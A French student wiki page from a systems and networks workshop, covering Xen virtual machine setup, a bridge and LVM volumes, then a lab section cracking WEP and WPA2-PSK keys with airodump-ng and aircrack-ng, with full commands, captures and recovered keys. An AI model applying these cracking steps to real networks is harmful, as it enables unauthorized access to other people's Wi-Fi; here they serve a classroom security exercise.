« Atelier SysRes SE4 2025/2026 E1 » : différence entre les versions

De wiki-se.plil.fr
Aller à la navigation Aller à la recherche
Ligne 68 : Ligne 68 :
* '''<code>/home</code>''' : dossiers utilisateurs (fichiers perso, configs, projets, clés SSH…)
* '''<code>/home</code>''' : dossiers utilisateurs (fichiers perso, configs, projets, clés SSH…)
* '''<code>/var</code>''' : données qui bougent beaucoup (logs, cache, bases de données, spool, etc.)
* '''<code>/var</code>''' : données qui bougent beaucoup (logs, cache, bases de données, spool, etc.)
Cette séparation a plusieurs avantages très concrets :
* '''Meilleure gestion de l’espace disque''' : tu peux dimensionner <code>/var</code> et <code>/home</code> indépendamment (et agrandir si besoin).
* '''Moins de risques''' : si <code>/var</code> explose (logs qui partent en vrille, cache énorme…), ça évite de remplir tout le disque système et de “tuer” la VM.
* '''Maintenance plus simple''' : sauvegarde/restauration ciblée (ex : sauvegarder <code>/home</code> sans prendre tout le système).
* '''Organisation propre''' : chaque VM a ses volumes clairement identifiés.
Pour chaque VM, on crée deux volumes logiques de 10 Go :<syntaxhighlight lang="bash">
lvcreate -L 10G -n SE4.<NomDeVM>.home virtual
lvcreate -L 10G -n SE4.<NomDeVM>.var virtual
</syntaxhighlight>
* <code>lvcreate</code> : commande qui '''crée un volume logique'''
* <code>-L 10G</code> : taille du volume (ici '''10 Go''')
* <code>-n <nom></code> : nom du volume logique (d’où le <code>SE4.<NomDeVM>.home</code>)
* <code>virtual</code> : le '''Volume Group''' dans lequel on crée le volume
Ces volumes seront ensuite '''attachés à la VM''' comme des disques (ou partitions virtuelles), puis '''formatés''' et '''montés''' dans la VM :
* le volume <code>.home</code> sera monté sur <code>/home</code>
* le volume <code>.var</code> sera monté sur <code>/var</code>
=== Fichier de configuration Xen ===
<syntaxhighlight lang="bash">
root        = '/dev/xvda2 ro'
disk        = [
                  'file:/usr/local/xen/domains/SE4.Merteuil/disk.img,xvda2,w',
                  'file:/usr/local/xen/domains/SE4.Merteuil/swap.img,xvda1,w',
          'phy:/dev/virtual/SE4.Merteuil.home,xvda3,w',
          'phy:/dev/virtual/SE4.Merteuil.var,xvdb1,w',
              ]
</syntaxhighlight>


== Cassage de clé WIFI ==
== Cassage de clé WIFI ==

Version du 22 février 2026 à 22:15

CRÉATION MACHINES VIRTUELLES

Il faut d'abord crée un "bridge" sur capbreton pour relier nos 3 machines virtuelles ensemble. Un "bridge" n'a rien de complexe, c'est un commutateur mais virtuel. C'est comme un commutateur physique avec des ports ethernet pour relier des machines ensemble mais il n'existe pas dans le monde physique seulement sur nos ordinateurs et VM. Pour cela, nous créons notre pont sur capbreton le commutateur/routeur dans la E304. Nous le faisons dans ce chemin : /etc/network/interfaces.d/SE42026_pcasimir_ahoudus

Veuillez faire en sorte de ne PAS modifier le fichier le fichier /etc/network/interfaces car c'est le fichier qui permet de configurer la connectivité de capbreton lui-même.

auto pont_Gercourt                                                                                                                                                      
iface pont_Gercourt inet manual                                                                                                                                         
        bridge_ports none                                                                                                                                               
        up ip link set $IFACE up                                                                                                                                        
        down ip link set $IFACE down

Ensuite, nous devons initialiser nos MV de services grâce à l'outil hyperviseur Xen.

Un hyperviseur, c’est le logiciel qui permet de faire tourner plusieurs “ordinateurs virtuels” (VM) sur un seul ordinateur physique.

Au lieu d’avoir 1 machine = 1 OS, tu as 1 machine physique = plusieurs OS (Linux, OpenWRT, Windows…) qui tournent en parallèle, chacun dans sa VM.

Un hyperviseur est “entre” le matériel et les VM, et il s’occupe de partager proprement :

  • CPU : qui a le droit d’exécuter quand (ordonnancement)
  • RAM : qui a droit à quelle mémoire (isolation, allocation)
  • Disques : chaque VM a “son disque” (souvent un fichier .img, LVM, etc.)
  • Réseau : chaque VM a une carte réseau virtuelle, connectée à un switch/bridge virtuel
  • Isolation/Sécurité : une VM ne doit pas pouvoir casser les autres.

Xen, c’est un hyperviseur “bare-metal” très utilisé historiquement en serveur/cloud.

Dans Xen, toutes les VM sont des domains.

  • Dom0 (Domain 0) : la VM “chef” (privilégiée)
    • c’est elle qui a les drivers matériels
    • c’est elle qui crée / détruit / configure les autres VM
    • elle gère souvent le réseau (bridges/VLAN) et le stockage
  • DomU : les VM “normales” (invitées)
    • elles ont des périphériques virtuels
    • elles passent souvent par Dom0 pour accéder au hardware

Petit schéma mental :

         Matériel (CPU/RAM/NIC/Disques)
                    │
                   Xen
                    │
        ┌───────────┴───────────┐
        │                       │
      Dom0                 Dom1, Dom2, Dom3...
 (admin + drivers)      (VM Linux / OpenWRT / etc.)

Il leur faut plusieurs paramètres pour fonctionner selon nos critères.

root@capbreton:~# xen-create-image --hostname=SE4.Merteuil --dhcp --bridge=pont_Gercourt --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force
  • xen-create-image : Commande permettant de créer une nouvelle machine virtuelle Xen
  • --hostname=SE4.Merteuil : Spécifie le nom d'hôte de la nouvelle MV créée. Ici, le nom d'hôte sera SE4.Atreus.
  • --dhcp : Indique que la MV obtiendra automatiquement une adresse IP via DHCP. Aucune configuration statique d'adresse IP ne sera nécessaire. Vous devriez quand même configuré votre /etc/network/interface dans votre VM pour qu'elle ait une adresse IPv4 sur votre commutateur virtuel/bridge.
  • --bridge=bifrost : Précise l'utilisation du pont réseau nommé bifrost pour connecter la machine virtuelle au réseau physique ou virtuel existant. Ceci permet une connexion directe de la VM au réseau.
  • --dir=/usr/local/xen : Définit le répertoire dans lequel seront stockées les images disque et les fichiers associés de la MV. Ici, l'image sera placée dans le dossier /usr/local/xen.
  • --size=10GB : Détermine la taille du disque virtuel pour cette MV. Dans cet exemple, le disque fera 10 Go.
  • --dist=daedalus : Indique la distribution du système d'exploitation à utiliser pour la MV. Ici, la distribution choisie s'appelle daedalus pour Debian.
  • --memory=2048M : Détermine la quantité de mémoire vive (RAM) allouée à la MV. Dans cet exemple, la MV aura 2048 Mo (soit 2 Go) de RAM.

Volumes Logiques

Dans notre infra, on ne met pas tout le système d’une VM sur un seul “disque” géant. On sépare certains répertoires dans des volumes logiques (LVM) dédiés, notamment :

  • /home : dossiers utilisateurs (fichiers perso, configs, projets, clés SSH…)
  • /var : données qui bougent beaucoup (logs, cache, bases de données, spool, etc.)


Cette séparation a plusieurs avantages très concrets :

  • Meilleure gestion de l’espace disque : tu peux dimensionner /var et /home indépendamment (et agrandir si besoin).
  • Moins de risques : si /var explose (logs qui partent en vrille, cache énorme…), ça évite de remplir tout le disque système et de “tuer” la VM.
  • Maintenance plus simple : sauvegarde/restauration ciblée (ex : sauvegarder /home sans prendre tout le système).
  • Organisation propre : chaque VM a ses volumes clairement identifiés.

Pour chaque VM, on crée deux volumes logiques de 10 Go :

lvcreate -L 10G -n SE4.<NomDeVM>.home virtual
lvcreate -L 10G -n SE4.<NomDeVM>.var virtual
  • lvcreate : commande qui crée un volume logique
  • -L 10G : taille du volume (ici 10 Go)
  • -n <nom> : nom du volume logique (d’où le SE4.<NomDeVM>.home)
  • virtual : le Volume Group dans lequel on crée le volume

Ces volumes seront ensuite attachés à la VM comme des disques (ou partitions virtuelles), puis formatés et montés dans la VM :

  • le volume .home sera monté sur /home
  • le volume .var sera monté sur /var

Fichier de configuration Xen

root        = '/dev/xvda2 ro'
disk        = [
                  'file:/usr/local/xen/domains/SE4.Merteuil/disk.img,xvda2,w',
                  'file:/usr/local/xen/domains/SE4.Merteuil/swap.img,xvda1,w',
		          'phy:/dev/virtual/SE4.Merteuil.home,xvda3,w',
		          'phy:/dev/virtual/SE4.Merteuil.var,xvdb1,w',
              ]

Cassage de clé WIFI

WEP

Sur un 1 terminal :

sudo airodump-ng wlan1 --write crackage_pcasimir/pcasimir --bssid 04:DA:D2:9C:50:50 -c4

Il faut laisser tourner le programme pendant un moment pour capturer un maximum d'IVs (environ 50*10³)

Ce que l'on voit :

CH  4 ][ Elapsed: 40 mins ][ 2026-02-10 16:07 ][ paused output

BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

04:DA:D2:9C:50:50  -64   0    10771    48468   31   4   54e. WEP  WEP         cracotte01    

BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes

04:DA:D2:9C:50:50  40:A5:EF:01:21:80  -73    0 -36e   621    58224  

sur 2ème terminal :

Une fois qu'on a 50*10³ IV on fait :

sudo aircrack-ng -a1 -b 04:DA:D2:9C:50:50 crackage_pcasimir/pcasimir-01.cap -s


Résultat :

  KB    depth   byte(vote)

   0    12   B5(55552) 84(53504) 2B(52992) 2F(52480) A0(52480) BA(52224) 

   1    05   49(66304) E8(55552) 20(55296) 65(55296) 73(55296) 5F(53760) 

   2   412   E1(48640) 0E(48384) 3D(48384) 63(48384) 6C(48384) 9C(48384) 

   3    43   B3(53248) 7B(52992) 95(52992) 31(52736) 12(52224) FF(52224) 

   4    12   21(55552) 17(52480) 26(52224) B5(52224) 16(51968) C0(51712) 

            KEY FOUND! [ FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE ] 

   Decrypted correctly: 100%

WPA2-PSK

pcasimir@zabeth13:~$ sudo airodump-ng wlan1 --write crackage_pcasimir/airodumpWPA --bssid 44:AD:D9:5F:87:00 -c13

CH 13 ][ Elapsed: 1 hour 44 mins ][ 2026-02-10 18:41 ][ fixed channel wlan1: 4 

BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

44:AD:D9:5F:87:00  -58   0    28293      508    0  13   54e. WPA2 CCMP   PSK  kracotte01    

BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes
pcasimir@zabeth13:~$ sudo aircrack-ng -a2 -b 44:AD:D9:5F:87:00 -w crackage_pcasimir/dico.txt crackage_pcasimir/airodumpWPA-01.cap

Aircrack-ng 1.7 

     [00:55:43] 66515032/100000000 keys tested (19870.44 k/s) 

     Time left: 28 minutes, 5 seconds                          66.52%

                          KEY FOUND! [ 66689666 ]

     Master Key     : 3C A8 6A 6B 80 C3 36 12 EC D6 36 89 9F E3 F6 BC 

                      D6 B2 24 8A 49 B4 9C 2A A3 6F 3E A0 96 15 8B F5 

     Transient Key  : A0 53 57 7D 4B 67 FB 00 00 00 00 00 00 00 00 00 

                      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

                      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

                      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

     EAPOL HMAC     : 52 DE 19 6D B0 E3 3B 2C 1A DA D3 F2 66 39 F2 DD